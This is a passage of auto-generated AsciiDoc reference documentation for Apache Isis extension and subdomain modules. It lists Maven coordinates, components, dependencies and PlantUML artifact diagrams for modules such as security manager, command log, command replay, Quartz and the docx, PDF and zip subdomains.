+\no.a.i.extensions.secman.jpa.dom.role.ApplicationRoleRepository +\no.a.i.extensions.secman.jpa.dom.tenancy.ApplicationTenancyRepository +\no.a.i.extensions.secman.jpa.dom.user.ApplicationUserRepository +\no.a.i.extensions.secman.jpa.seed.SeedSecurityModuleService +\n****\n\n.Dependencies\n****\norg.apache.isis.core:isis-core-runtime:jar:<managed> +\norg.apache.isis.extensions:isis-extensions-secman-api:jar:<managed> +\norg.apache.isis.extensions:isis-extensions-secman-model:jar:<managed> +\norg.apache.isis.persistence:isis-persistence-jpa-applib:jar:<managed> +\norg.apache.isis.testing:isis-testing-fixtures-applib:jar:<managed> +\n****\n\n.Document Index Entries\n****\nxref:refguide:extensions:index\/secman\/jpa\/IsisModuleExtSecmanPersistenceJpa.adoc[IsisModuleExtSecmanPersistenceJpa], xref:refguide:extensions:index\/secman\/jpa\/seed\/SeedSecurityModuleService.adoc[SeedSecurityModuleService], xref:refguide:extensions:index\/secman\/jpa\/seed\/SeedUsersAndRolesFixtureScript.adoc[SeedUsersAndRolesFixtureScript], xref:refguide:extensions:index\/secman\/jpa\/seed\/scripts\/GlobalTenancy.adoc[GlobalTenancy], xref:refguide:extensions:index\/secman\/jpa\/seed\/scripts\/IsisExtFixturesFixtureResultsRoleAndPermissions.adoc[IsisExtFixturesFixtureResultsRoleAndPermissions], xref:refguide:extensions:index\/secman\/jpa\/seed\/scripts\/IsisExtSecmanAdminRoleAndPermissions.adoc[IsisExtSecmanAdminRoleAndPermissions], xref:refguide:extensions:index\/secman\/jpa\/seed\/scripts\/IsisExtSecmanAdminUser.adoc[IsisExtSecmanAdminUser], xref:refguide:extensions:index\/secman\/jpa\/seed\/scripts\/IsisExtSecmanFixtureRoleAndPermissions.adoc[IsisExtSecmanFixtureRoleAndPermissions], xref:refguide:extensions:index\/secman\/jpa\/seed\/scripts\/IsisExtSecmanRegularUserRoleAndPermissions.adoc[IsisExtSecmanRegularUserRoleAndPermissions], xref:refguide:extensions:index\/secman\/jpa\/userreg\/SecurityModuleAppUserRegistrationServiceAbstract.adoc[SecurityModuleAppUserRegistrationServiceAbstract]\n****\n\n|Apache Isis Ext - Sec Man Realm (Using Shiro)\n[source,yaml]\n----\nGroup: org.apache.isis.extensions\nArtifact: isis-extensions-secman-shiro-realm\nType: jar\nDirectory: \/extensions\/security\/secman\/shiro-realm\n----\n|.Components\n****\no.a.i.extensions.secman.shiro.services.SecurityRealmServiceUsingShiro +\n****\n\n.Dependencies\n****\norg.apache.isis.core:isis-core-runtime:jar:<managed> +\norg.apache.isis.extensions:isis-extensions-secman-api:jar:2.0.0-SNAPSHOT +\norg.apache.isis.security:isis-security-shiro:jar:<managed> +\n****\n\n.Document Index Entries\n****\nxref:refguide:extensions:index\/secman\/shiro\/IsisModuleExtSecmanRealmShiro.adoc[IsisModuleExtSecmanRealmShiro], xref:refguide:extensions:index\/secman\/shiro\/IsisModuleExtSecmanShiroRealm.adoc[IsisModuleExtSecmanShiroRealm], xref:refguide:extensions:index\/secman\/shiro\/services\/SecurityRealmServiceUsingShiro.adoc[SecurityRealmServiceUsingShiro], xref:refguide:extensions:index\/secman\/shiro\/util\/ShiroUtils.adoc[ShiroUtils]\n****\n\n|Apache Isis Ext - Security - Shiro LDAP Realm (parent)\n[source,yaml]\n----\nGroup: org.apache.isis.extensions\nArtifact: isis-extensions-shiro-realm-ldap\nType: pom\nDirectory: \/extensions\/security\/shiro-realm-ldap\n----\n|Implementation of Shiro Realm using LDAP.\n\n|Apache Isis Ext - Security - Shiro LDAP Realm (impl)\n[source,yaml]\n----\nGroup: org.apache.isis.extensions\nArtifact: isis-extensions-shiro-realm-ldap-impl\nType: jar\nDirectory: \/extensions\/security\/shiro-realm-ldap\/impl\n----\n|.Dependencies\n****\norg.apache.isis.core:isis-core-internaltestsupport:jar:<managed> +\norg.apache.isis.security:isis-security-shiro:jar:<managed> +\n****\n\n.Document Index Entries\n****\nxref:refguide:extensions:index\/shirorealmldap\/realm\/impl\/IsisLdapContextFactory.adoc[IsisLdapContextFactory], xref:refguide:extensions:index\/shirorealmldap\/realm\/impl\/IsisLdapRealm.adoc[IsisLdapRealm], xref:refguide:extensions:index\/shirorealmldap\/realm\/impl\/IsisModuleExtShiroRealmLdapImpl.adoc[IsisModuleExtShiroRealmLdapImpl]\n****\n|===\n\n=== Core: Command Log\n\n[plantuml,Core: Command Log,svg]\n----\n@startuml(id=Core:_Command_Log)\ntitle Core: Command Log - Containers\ncaption Artifact Hierarchy (Maven)\n\nskinparam {\n shadowing false\n arrowFontSize 10\n defaultTextAlignment center\n wrapWidth 200\n maxMessageSize 100\n}\nhide stereotype\nleft to right direction\nskinparam rectangle<<2>> {\n BackgroundColor #438dd5\n FontColor #fffffe\n BorderColor #2E6295\n}\nskinparam rectangle<<3>> {\n BackgroundColor #438dd5\n FontColor #fffffe\n BorderColor #2E6295\n}\npackage \"Core: Command Log\\n[Software System]\" {\n rectangle \"==Apache Isis Ext - Command Log\\n<size:10>[Container: packaging: pom]<\/size>\" <<2>> as 2\n rectangle \"==Apache Isis Ext - Command Log Implementation (JDO)\\n<size:10>[Container: packaging: jar]<\/size>\" <<3>> as 3\n}\n2 .[#707070].> 3 : \"\"\n@enduml\n----\n.Projects\/Modules (Core: Command Log)\n[cols=\"3a,5a\", options=\"header\"]\n|===\n|Coordinates |Description \n\n|Apache Isis Ext - Command Log\n[source,yaml]\n----\nGroup: org.apache.isis.extensions\nArtifact: isis-extensions-command-log\nType: pom\nDirectory: \/extensions\/core\/command-log\n----\n|Logs commands\n\n|Apache Isis Ext - Command Log Implementation (JDO)\n[source,yaml]\n----\nGroup: org.apache.isis.extensions\nArtifact: isis-extensions-command-log-jdo\nType: jar\nDirectory: \/extensions\/core\/command-log\/impl\n----\n|.Components\n****\no.a.i.extensions.commandlog.impl.CommandSubscriberForJdo +\no.a.i.extensions.commandlog.impl.jdo.CommandJdo$TableColumnOrderDefault +\no.a.i.extensions.commandlog.impl.jdo.CommandJdo$TitleProvider +\no.a.i.extensions.commandlog.impl.jdo.CommandJdoRepository +\no.a.i.extensions.commandlog.impl.ui.CommandServiceMenu +\n****\n\n.Dependencies\n****\norg.apache.isis.core:isis-applib:jar:<managed> +\norg.apache.isis.core:isis-core-config:jar:<managed> +\norg.apache.isis.core:isis-core-runtimeservices:jar:<managed> +\norg.apache.isis.mavendeps:isis-mavendeps-jdo:pom:<managed> +\norg.apache.isis.testing:isis-testing-fixtures-applib:jar:<managed> +\norg.apache.isis.testing:isis-testing-integtestsupport-applib:jar:<managed> +\norg.apache.isis.testing:isis-testing-unittestsupport-applib:jar:<managed> +\n****\n\n.Document Index Entries\n****\nxref:refguide:extensions:index\/commandlog\/impl\/CommandSubscriberForJdo.adoc[CommandSubscriberForJdo], xref:refguide:extensions:index\/commandlog\/impl\/IsisModuleExtCommandLogImpl.adoc[IsisModuleExtCommandLogImpl], xref:refguide:extensions:index\/commandlog\/impl\/mixins\/HasInteractionId_command.adoc[HasInteractionId_command], xref:refguide:extensions:index\/commandlog\/impl\/mixins\/HasUsername_recentCommandsByUser.adoc[HasUsername_recentCommandsByUser], xref:refguide:extensions:index\/commandlog\/impl\/ui\/CommandServiceMenu.adoc[CommandServiceMenu]\n****\n|===\n\n=== Core: Command Replay\n\n[plantuml,Core: Command Replay,svg]\n----\n@startuml(id=Core:_Command_Replay)\ntitle Core: Command Replay - Containers\ncaption Artifact Hierarchy (Maven)\n\nskinparam {\n shadowing false\n arrowFontSize 10\n defaultTextAlignment center\n wrapWidth 200\n maxMessageSize 100\n}\nhide stereotype\nleft to right direction\nskinparam rectangle<<2>> {\n BackgroundColor #438dd5\n FontColor #fffffe\n BorderColor #2E6295\n}\nskinparam rectangle<<3>> {\n BackgroundColor #438dd5\n FontColor #fffffe\n BorderColor #2E6295\n}\nskinparam rectangle<<4>> {\n BackgroundColor #438dd5\n FontColor #fffffe\n BorderColor #2E6295\n}\npackage \"Core: Command Replay\\n[Software System]\" {\n rectangle \"==Apache Isis Ext - Command Replay\\n<size:10>[Container: packaging: pom]<\/size>\" <<2>> as 2\n rectangle \"==Apache Isis Ext - Command Replay for Primary\\n<size:10>[Container: packaging: jar]<\/size>\" <<3>> as 3\n rectangle \"==Apache Isis Ext - Command Replay for Secondary\\n<size:10>[Container: packaging: jar]<\/size>\" <<4>> as 4\n}\n2 .[#707070].> 3 : \"\"\n2 .[#707070].> 4 : \"\"\n@enduml\n----\n.Projects\/Modules (Core: Command Replay)\n[cols=\"3a,5a\", options=\"header\"]\n|===\n|Coordinates |Description \n\n|Apache Isis Ext - Command Replay\n[source,yaml]\n----\nGroup: org.apache.isis.extensions\nArtifact: isis-extensions-command-replay\nType: pom\nDirectory: \/extensions\/core\/command-replay\n----\n|Replays commands to secondary system\n\n|Apache Isis Ext - Command Replay for Primary\n[source,yaml]\n----\nGroup: org.apache.isis.extensions\nArtifact: isis-extensions-command-replay-primary\nType: jar\nDirectory: \/extensions\/core\/command-replay\/primary\n----\n|A module for obtaining commands from a primary\n\n.Components\n****\no.a.i.extensions.commandreplay.primary.config.PrimaryConfig +\no.a.i.extensions.commandreplay.primary.spiimpl.CaptureResultOfCommand +\n****\n\n.Dependencies\n****\norg.apache.isis.core:isis-core-config:jar:<managed> +\norg.apache.isis.core:isis-core-runtime:jar:<managed> +\norg.apache.isis.core:isis-schema:jar:<managed> +\norg.apache.isis.extensions:isis-extensions-command-log-jdo:jar:<managed> +\norg.apache.isis.mappings:isis-mappings-jaxrsclient-applib:jar:<managed> +\norg.apache.isis.mappings:isis-mappings-jaxrsclient-impl:jar:<managed> +\norg.apache.isis.testing:isis-testing-fixtures-applib:jar:<managed> +\n****\n\n.Document Index Entries\n****\nxref:refguide:extensions:index\/commandreplay\/primary\/IsisModuleExtCommandReplayPrimary.adoc[IsisModuleExtCommandReplayPrimary], xref:refguide:extensions:index\/commandreplay\/primary\/config\/PrimaryConfig.adoc[PrimaryConfig], xref:refguide:extensions:index\/commandreplay\/primary\/mixins\/Object_openOnSecondary.adoc[Object_openOnSecondary], xref:refguide:extensions:index\/commandreplay\/primary\/restapi\/CommandRetrievalService.adoc[CommandRetrievalService], xref:refguide:extensions:index\/commandreplay\/primary\/ui\/CommandReplayOnPrimaryService.adoc[CommandReplayOnPrimaryService]\n****\n\n|Apache Isis Ext - Command Replay for Secondary\n[source,yaml]\n----\nGroup: org.apache.isis.extensions\nArtifact: isis-extensions-command-replay-secondary\nType: jar\nDirectory: \/extensions\/core\/command-replay\/secondary\n----\n|A module providing a Quartz Job to run on a secondary system,\nfor obtaining commands from a primary and saving them so that they are replayed.\n\n.Components\n****\no.a.i.extensions.commandreplay.secondary.analyser.CommandReplayAnalyserException +\no.a.i.extensions.commandreplay.secondary.analyser.CommandReplayAnalyserResult +\no.a.i.extensions.commandreplay.secondary.analysis.CommandReplayAnalysisService +\no.a.i.extensions.commandreplay.secondary.clock.TickingClockService +\no.a.i.extensions.commandreplay.secondary.config.SecondaryConfig +\no.a.i.extensions.commandreplay.secondary.executor.CommandExecutorServiceWithTime +\no.a.i.extensions.commandreplay.secondary.fetch.CommandFetcher +\n****\n\n.Dependencies\n****\norg.apache.isis.core:isis-core-config:jar:<managed> +\norg.apache.isis.core:isis-core-internaltestsupport:jar:<managed> +\norg.apache.isis.core:isis-core-runtime:jar:<managed> +\norg.apache.isis.core:isis-schema:jar:<managed> +\norg.apache.isis.extensions:isis-extensions-quartz-impl:jar:<managed> +\norg.apache.isis.mappings:isis-mappings-jaxrsclient-applib:jar:<managed> +\norg.apache.isis.mappings:isis-mappings-jaxrsclient-impl:jar:<managed> +\norg.apache.isis.testing:isis-testing-fixtures-applib:jar:<managed> +\n****\n\n.Document Index Entries\n****\nxref:refguide:extensions:index\/commandreplay\/secondary\/IsisModuleExtCommandReplaySecondary.adoc[IsisModuleExtCommandReplaySecondary], xref:refguide:extensions:index\/commandreplay\/secondary\/SecondaryStatus.adoc[SecondaryStatus], xref:refguide:extensions:index\/commandreplay\/secondary\/analyser\/CommandReplayAnalyser.adoc[CommandReplayAnalyser], xref:refguide:extensions:index\/commandreplay\/secondary\/analyser\/CommandReplayAnalyserException.adoc[CommandReplayAnalyserException], xref:refguide:extensions:index\/commandreplay\/secondary\/analyser\/CommandReplayAnalyserResult.adoc[CommandReplayAnalyserResult], xref:refguide:extensions:index\/commandreplay\/secondary\/analysis\/CommandReplayAnalysisService.adoc[CommandReplayAnalysisService], xref:refguide:extensions:index\/commandreplay\/secondary\/clock\/TickingClockService.adoc[TickingClockService], xref:refguide:extensions:index\/commandreplay\/secondary\/config\/SecondaryConfig.adoc[SecondaryConfig], xref:refguide:extensions:index\/commandreplay\/secondary\/executor\/CommandExecutorServiceWithTime.adoc[CommandExecutorServiceWithTime], xref:refguide:extensions:index\/commandreplay\/secondary\/fetch\/CommandFetcher.adoc[CommandFetcher], xref:refguide:extensions:index\/commandreplay\/secondary\/job\/ReplicateAndReplayJob.adoc[ReplicateAndReplayJob], xref:refguide:extensions:index\/commandreplay\/secondary\/job\/SecondaryStatusData.adoc[SecondaryStatusData], xref:refguide:extensions:index\/commandreplay\/secondary\/jobcallables\/ReplicateAndRunCommands.adoc[ReplicateAndRunCommands], xref:refguide:extensions:index\/commandreplay\/secondary\/mixins\/CommandJdo_exclude.adoc[CommandJdo_exclude], xref:refguide:extensions:index\/commandreplay\/secondary\/mixins\/CommandJdo_replayQueue.adoc[CommandJdo_replayQueue], xref:refguide:extensions:index\/commandreplay\/secondary\/mixins\/Object_openOnPrimary.adoc[Object_openOnPrimary], xref:refguide:extensions:index\/commandreplay\/secondary\/spi\/ReplayCommandExecutionController.adoc[ReplayCommandExecutionController], xref:refguide:extensions:index\/commandreplay\/secondary\/ui\/CommandReplayOnSecondaryService.adoc[CommandReplayOnSecondaryService]\n****\n|===\n\n=== Core: Model Annotation\n\n[plantuml,Core: Model Annotation,svg]\n----\n@startuml(id=Core:_Model_Annotation)\ntitle Core: Model Annotation - Containers\ncaption Artifact Hierarchy (Maven)\n\nskinparam {\n shadowing false\n arrowFontSize 10\n defaultTextAlignment center\n wrapWidth 200\n maxMessageSize 100\n}\nhide stereotype\nleft to right direction\nskinparam rectangle<<2>> {\n BackgroundColor #438dd5\n FontColor #fffffe\n BorderColor #2E6295\n}\npackage \"Core: Model Annotation\\n[Software System]\" {\n rectangle \"==Apache Isis Ext - @Model\\n<size:10>[Container: packaging: jar]<\/size>\" <<2>> as 2\n}\n@enduml\n----\n.Projects\/Modules (Core: Model Annotation)\n[cols=\"3a,5a\", options=\"header\"]\n|===\n|Coordinates |Description \n\n|Apache Isis Ext - @Model\n[source,yaml]\n----\nGroup: org.apache.isis.extensions\nArtifact: isis-extensions-modelannotation\nType: jar\nDirectory: \/extensions\/core\/model-annotation\n----\n|Allows supporting methods to be annotated as @Model, to make explicit the bounds of the metamodel.\n\n.Components\n****\no.a.i.extensions.modelannotation.metamodel.services.IncubatorMetaModelPlugin +\n****\n\n.Dependencies\n****\norg.apache.isis.core:isis-core-metamodel:jar:<managed> +\norg.apache.isis.core:isis-core-webapp:jar:<managed> +\norg.apache.isis.viewer:isis-viewer-wicket-ui:jar:<managed> +\n****\n\n.Document Index Entries\n****\nxref:refguide:extensions:index\/modelannotation\/applib\/IsisModuleIncModelApplib.adoc[IsisModuleIncModelApplib], xref:refguide:extensions:index\/modelannotation\/applib\/annotation\/Model.adoc[Model], xref:refguide:extensions:index\/modelannotation\/metamodel\/IsisModuleExtModelAnnotation.adoc[IsisModuleExtModelAnnotation], xref:refguide:extensions:index\/modelannotation\/metamodel\/facets\/SupportingMethodValidatorRefinerFactory.adoc[SupportingMethodValidatorRefinerFactory], xref:refguide:extensions:index\/modelannotation\/metamodel\/services\/IncubatorMetaModelPlugin.adoc[IncubatorMetaModelPlugin]\n****\n|===\n\n=== Core: Quartz\n\n[plantuml,Core: Quartz,svg]\n----\n@startuml(id=Core:_Quartz)\ntitle Core: Quartz - Containers\ncaption Artifact Hierarchy (Maven)\n\nskinparam {\n shadowing false\n arrowFontSize 10\n defaultTextAlignment center\n wrapWidth 200\n maxMessageSize 100\n}\nhide stereotype\nleft to right direction\nskinparam rectangle<<2>> {\n BackgroundColor #438dd5\n FontColor #fffffe\n BorderColor #2E6295\n}\nskinparam rectangle<<3>> {\n BackgroundColor #438dd5\n FontColor #fffffe\n BorderColor #2E6295\n}\npackage \"Core: Quartz\\n[Software System]\" {\n rectangle \"==Apache Isis Ext - Quartz\\n<size:10>[Container: packaging: pom]<\/size>\" <<2>> as 2\n rectangle \"==Apache Isis Ext - Quartz Impl\\n<size:10>[Container: packaging: jar]<\/size>\" <<3>> as 3\n}\n2 .[#707070].> 3 : \"\"\n@enduml\n----\n.Projects\/Modules (Core: Quartz)\n[cols=\"3a,5a\", options=\"header\"]\n|===\n|Coordinates |Description \n\n|Apache Isis Ext - Quartz\n[source,yaml]\n----\nGroup: org.apache.isis.extensions\nArtifact: isis-extensions-quartz\nType: pom\nDirectory: \/extensions\/core\/quartz\n----\n|Integrates Quartz\n\n|Apache Isis Ext - Quartz Impl\n[source,yaml]\n----\nGroup: org.apache.isis.extensions\nArtifact: isis-extensions-quartz-impl\nType: jar\nDirectory: \/extensions\/core\/quartz\/impl\n----\n|.Dependencies\n****\norg.apache.isis.core:isis-core-config:jar:<managed> +\norg.apache.isis.core:isis-core-security:jar:<managed> +\norg.apache.isis.extensions:isis-extensions-command-log-jdo:jar:<managed> +\norg.springframework.boot:spring-boot-starter-quartz:jar:<managed> +\n****\n\n.Document Index Entries\n****\nxref:refguide:extensions:index\/quartz\/IsisModuleExtQuartzImpl.adoc[IsisModuleExtQuartzImpl], xref:refguide:extensions:index\/quartz\/context\/JobExecutionData.adoc[JobExecutionData], xref:refguide:extensions:index\/quartz\/spring\/AutowiringSpringBeanJobFactory.adoc[AutowiringSpringBeanJobFactory]\n****\n|===\n\n=== Security: Secman\n\n=== Security: Shiro LDAP Realm\n\n=== RO Viewer: CORS\n\n=== Wicket Viewer: Excel Download\n\n=== Wicket Viewer: Full Calendar\n\n=== Wicket Viewer: Pdf.js\n\n== Subdomains\n\n[plantuml,Subdomains,svg]\n----\n@startuml(id=Subdomains)\ntitle Subdomains - Containers\ncaption Artifact Hierarchy (Maven)\n\nskinparam {\n shadowing false\n arrowFontSize 10\n defaultTextAlignment center\n wrapWidth 200\n maxMessageSize 100\n}\nhide stereotype\nleft to right direction\nskinparam rectangle<<11>> {\n BackgroundColor #438dd5\n FontColor #fffffe\n BorderColor #2E6295\n}\nskinparam rectangle<<12>> {\n BackgroundColor #438dd5\n FontColor #fffffe\n BorderColor #2E6295\n}\nskinparam rectangle<<2>> {\n BackgroundColor #438dd5\n FontColor #fffffe\n BorderColor #2E6295\n}\nskinparam rectangle<<3>> {\n BackgroundColor #438dd5\n FontColor #fffffe\n BorderColor #2E6295\n}\nskinparam rectangle<<4>> {\n BackgroundColor #438dd5\n FontColor #fffffe\n BorderColor #2E6295\n}\nskinparam rectangle<<5>> {\n BackgroundColor #438dd5\n FontColor #fffffe\n BorderColor #2E6295\n}\nskinparam rectangle<<6>> {\n BackgroundColor #438dd5\n FontColor #fffffe\n BorderColor #2E6295\n}\nskinparam rectangle<<7>> {\n BackgroundColor #438dd5\n FontColor #fffffe\n BorderColor #2E6295\n}\nskinparam rectangle<<8>> {\n BackgroundColor #438dd5\n FontColor #fffffe\n BorderColor #2E6295\n}\nskinparam rectangle<<9>> {\n BackgroundColor #438dd5\n FontColor #fffffe\n BorderColor #2E6295\n}\nskinparam rectangle<<10>> {\n BackgroundColor #438dd5\n FontColor #fffffe\n BorderColor #2E6295\n}\npackage \"Subdomains\\n[Software System]\" {\n rectangle \"==Apache Isis Sub - Docx (applib)\\n<size:10>[Container: packaging: jar]<\/size>\" <<4>> as 4\n rectangle \"==Apache Isis Sub - Docx (parent)\\n<size:10>[Container: packaging: pom]<\/size>\" <<3>> as 3\n rectangle \"==Apache Isis Sub - Freemarker (applib)\\n<size:10>[Container: packaging: jar]<\/size>\" <<6>> as 6\n rectangle \"==Apache Isis Sub - Freemarker (parent)\\n<size:10>[Container: packaging: pom]<\/size>\" <<5>> as 5\n rectangle \"==Apache Isis Sub - Ognl (applib)\\n<size:10>[Container: packaging: jar]<\/size>\" <<8>> as 8\n rectangle \"==Apache Isis Sub - Ognl (parent)\\n<size:10>[Container: packaging: pom]<\/size>\" <<7>> as 7\n rectangle \"==Apache Isis Sub - PDF Box (applib)\\n<size:10>[Container: packaging: jar]<\/size>\" <<10>> as 10\n rectangle \"==Apache Isis Sub - PDF Box (parent)\\n<size:10>[Container: packaging: pom]<\/size>\" <<9>> as 9\n rectangle \"==Apache Isis Sub - Zip (applib)\\n<size:10>[Container: packaging: jar]<\/size>\" <<12>> as 12\n rectangle \"==Apache Isis Sub - Zip (parent)\\n<size:10>[Container: packaging: pom]<\/size>\" <<11>> as 11\n rectangle \"==Apache Isis Subdomains\\n<size:10>[Container: packaging: pom]<\/size>\" <<2>> as 2\n}\n3 .[#707070].> 4 : \"\"\n5 .[#707070].> 6 : \"\"\n7 .[#707070].> 8 : \"\"\n9 .[#707070].> 10 : \"\"\n11 .[#707070].> 12 : \"\"\n2 .[#707070].> 3 : \"\"\n2 .[#707070].> 5 : \"\"\n2 .[#707070].> 7 : \"\"\n2 .[#707070].> 9 : \"\"\n2 .[#707070].> 11 : \"\"\n@enduml\n----\n.Projects\/Modules (Subdomains)\n[cols=\"3a,5a\", options=\"header\"]\n|===\n|Coordinates |Description \n\n|Apache Isis Subdomains\n[source,yaml]\n----\nGroup: org.apache.isis.subdomains\nArtifact: isis-subdomains\nType: pom\nDirectory: \/subdomains\n----\n|A library of domain services and of supporting subdomains (often technical in nature), to be called from the\ncore domain of an Apache Isis applications.\n\n.Dependencies\n****\norg.projectlombok:lombok:jar:<managed> +\n****\n\n|Apache Isis Sub - Docx (parent)\n[source,yaml]\n----\nGroup: org.apache.isis.subdomains\nArtifact: isis-subdomains-docx\nType: pom\nDirectory: \/subdomains\/docx\n----\n|Uses the Apache POI library for mail merge functions of .docx Word documents\n\n|Apache Isis Sub - Docx (applib)\n[source,yaml]\n----\nGroup: org.apache.isis.subdomains\nArtifact: isis-subdomains-docx-applib\nType: jar\nDirectory: \/subdomains\/docx\/applib\n----\n|.Dependencies\n****\norg.apache.isis.core:isis-applib:jar:<managed> +\n****\n\n|Apache Isis Sub - Freemarker (parent)\n[source,yaml]\n----\nGroup: org.apache.isis.subdomains\nArtifact: isis-subdomains-freemarker\nType: pom\nDirectory: \/subdomains\/freemarker\n----\n|Integrates Freemarker Library\n\n|Apache Isis Sub - Freemarker (applib)\n[source,yaml]\n----\nGroup: org.apache.isis.subdomains\nArtifact: isis-subdomains-freemarker-applib\nType: jar\nDirectory: \/subdomains\/freemarker\/applib\n----\n|.Dependencies\n****\norg.apache.isis.core:isis-applib:jar:<managed> +\n****\n\n|Apache Isis Sub - Ognl (parent)\n[source,yaml]\n----\nGroup: org.apache.isis.subdomains\nArtifact: isis-subdomains-ognl\nType: pom\nDirectory: \/subdomains\/ognl\n----\n|Integrates Ognl Library\n\n|Apache Isis Sub - Ognl (applib)\n[source,yaml]\n----\nGroup: org.apache.isis.subdomains\nArtifact: isis-subdomains-ognl-applib\nType: jar\nDirectory: \/subdomains\/ognl\/applib\n----\n|.Dependencies\n****\norg.apache.isis.core:isis-applib:jar:<managed> +\n****\n\n|Apache Isis Sub - PDF Box (parent)\n[source,yaml]\n----\nGroup: org.apache.isis.subdomains\nArtifact: isis-subdomains-pdfbox\nType: pom\nDirectory: \/subdomains\/pdfbox\n----\n|Integrates PDF Box Library\n\n|Apache Isis Sub - PDF Box (applib)\n[source,yaml]\n----\nGroup: org.apache.isis.subdomains\nArtifact: isis-subdomains-pdfbox-applib\nType: jar\nDirectory: \/subdomains\/pdfbox\/applib\n----\n|Integrates PDF Box Library\n\n.Dependencies\n****\norg.apache.isis.core:isis-applib:jar:<managed> +\n****\n\n|Apache Isis Sub - Zip (parent)\n[source,yaml]\n----\nGroup: org.apache.isis.subdomains\nArtifact: isis-subdomains-zip\nType: pom\nDirectory: \/subdomains\/zip\n----\n|A domain service for Apache Isis', for zipping utilities.\n\n|Apache Isis Sub - Zip (applib)\n[source,yaml]\n----\nGroup: org.apache.isis.subdomains\nArtifact: isis-subdomains-zip-applib\nType: jar\nDirectory: \/subdomains\/zip\/applib\n----\n|.Components\n****\no.a.i.extensions.zip.dom.impl.ZipService +\n****\n\n.Dependencies\n****\norg.apache.isis.commons:isis-commons:jar:<managed> +\norg.apache.isis.core:isis-applib:jar:<managed> +\norg.projectlombok:lombok:jar:<managed> +\n****\n|===\n\n=== Base\n\n[plantuml,Base,svg]\n----\n@startuml(id=Base)\ntitle Base - Containers\ncaption Artifact Hierarchy (Maven)\n\nskinparam {\n shadowing false\n arrowFontSize 10\n defaultTextAlignment center\n wrapWidth 200\n maxMessageSize 100\n}\nhide stereotype\nleft to right direction\nskinparam rectangle<<2>> {\n BackgroundColor #438dd5\n FontColor #fffffe\n BorderColor #2E6295\n}\nskinparam rectangle<<3>> {\n BackgroundColor #438dd5\n FontColor #fffffe\n BorderColor #2E6295\n}\npackage \"Base\\n[Software System]\" {\n rectangle \"==Apache Isis Sub - Base (applib)\\n<size:10>[Container: packaging: jar]<\/size>\" <<3>> as 3\n rectangle \"==Apache Isis Sub - Base (parent)\\n<size:10>[Container: packaging: pom]<\/size>\" <<2>> as 2\n}\n2 .[#707070].> 3 : \"\"\n@enduml\n----\n.Projects\/Modules (Base)\n[cols=\"3a,5a\", options=\"header\"]\n|===\n|Coordinates |Description \n\n|Apache Isis Sub - Base (parent)\n[source,yaml]\n----\nGroup: org.apache.isis.subdomains\nArtifact: isis-subdomains-base\nType: pom\nDirectory: \/subdomains\/base\n----\n|A module providing Base utilities for other subdomain modules\n\n|Apache Isis Sub - Base (applib)\n[source,yaml]\n----\nGroup: org.apache.isis.subdomains\nArtifact: isis-subdomains-base-applib\nType: jar\nDirectory: \/subdomains\/base\/applib\n----\n|.Components\n****\no.a.i.subdomains.base.applib.services.calendar.CalendarService +\n****\n\n.Dependencies\n****\norg.apache.isis.commons:isis-commons:jar:<managed> +\norg.apache.isis.core:isis-applib:jar:<managed> +\norg.apache.isis.core:isis-core-metamodel:jar:<managed> +\norg.apache.isis.testing:isis-testing-unittestsupport-applib:jar:<managed> +\norg.datanucleus:javax.jdo:jar:<managed> +\n****\n\n.Document Index Entries\n****\nxref:refguide:subdomains:index\/base\/applib\/Chained.adoc[Chained], xref:refguide:subdomains:index\/base\/applib\/Dflt.adoc[Dflt], xref:refguide:subdomains:index\/base\/applib\/IsisModuleSubdomainsBaseApplib.adoc[IsisModuleSubdomainsBaseApplib], xref:refguide:subdomains:index\/base\/applib\/PowerType.adoc[PowerType], xref:refguide:subdomains:index\/base\/applib\/Titled.adoc[Titled], xref:refguide:subdomains:index\/base\/applib\/TitledEnum.adoc[TitledEnum], xref:refguide:subdomains:index\/base\/applib\/services\/BaseServicesModule.adoc[BaseServicesModule], xref:refguide:subdomains:index\/base\/applib\/services\/calendar\/CalendarService.adoc[CalendarService], xref:refguide:subdomains:index\/base\/applib\/types\/DescriptionType.adoc[DescriptionType], xref:refguide:subdomains:index\/base\/applib\/types\/FqcnType.adoc[FqcnType], xref:refguide:subdomains:index\/base\/applib\/types\/MoneyType.adoc[MoneyType], xref:refguide:subdomains:index\/base\/applib\/types\/NameType.adoc[NameType], xref:refguide:subdomains:index\/base\/applib\/types\/NotesType.adoc[NotesType], xref:refguide:subdomains:index\/base\/applib\/types\/ObjectIdentifierType.adoc[ObjectIdentifierType], xref:refguide:subdomains:index\/base\/applib\/types\/PercentageType.adoc[PercentageType], xref:refguide:subdomains:index\/base\/applib\/types\/ProperNameType.adoc[ProperNameType], xref:refguide:subdomains:index\/base\/applib\/types\/ReferenceType.adoc[ReferenceType], xref:refguide:subdomains:index\/base\/applib\/types\/TitleType.adoc[TitleType], xref:refguide:subdomains:index\/base\/applib\/types\/UrlTemplateType.adoc[UrlTemplateType], xref:refguide:subdomains:index\/base\/applib\/types\/UserNameType.adoc[UserNameType], xref:refguide:subdomains:index\/base\/applib\/types\/XxxType.adoc[XxxType], xref:refguide:subdomains:index\/base\/applib\/utils\/ClassUtils.adoc[ClassUtils], xref:refguide:subdomains:index\/base\/applib\/utils\/JodaPeriodUtils.adoc[JodaPeriodUtils], xref:refguide:subdomains:index\/base\/applib\/utils\/MathUtils.adoc[MathUtils], xref:refguide:subdomains:index\/base\/applib\/utils\/MessageUtils.adoc[MessageUtils], xref:refguide:subdomains:index\/base\/applib\/utils\/StringUtils.adoc[StringUtils], xref:refguide:subdomains:index\/base\/applib\/utils\/TitleBuilder.adoc[TitleBuilder], xref:refguide:subdomains:index\/base\/applib\/valuetypes\/AbstractInterval.adoc[AbstractInterval], xref:refguide:subdomains:index\/base\/applib\/valuetypes\/LocalDateInterval.adoc[LocalDateInterval], xref:refguide:subdomains:index\/base\/applib\/valuetypes\/VT.adoc[VT], xref:refguide:subdomains:index\/base\/applib\/with\/WithCodeComparable.adoc[WithCodeComparable], xref:refguide:subdomains:index\/base\/applib\/with\/WithCodeGetter.adoc[WithCodeGetter], xref:refguide:subdomains:index\/base\/applib\/with\/WithCodeUnique.adoc[WithCodeUnique], xref:refguide:subdomains:index\/base\/applib\/with\/WithDescriptionComparable.adoc[WithDescriptionComparable], xref:refguide:subdomains:index\/base\/applib\/with\/WithDescriptionGetter.adoc[WithDescriptionGetter], xref:refguide:subdomains:index\/base\/applib\/with\/WithDescriptionUnique.adoc[WithDescriptionUnique], xref:refguide:subdomains:index\/base\/applib\/with\/WithInterval.adoc[WithInterval], 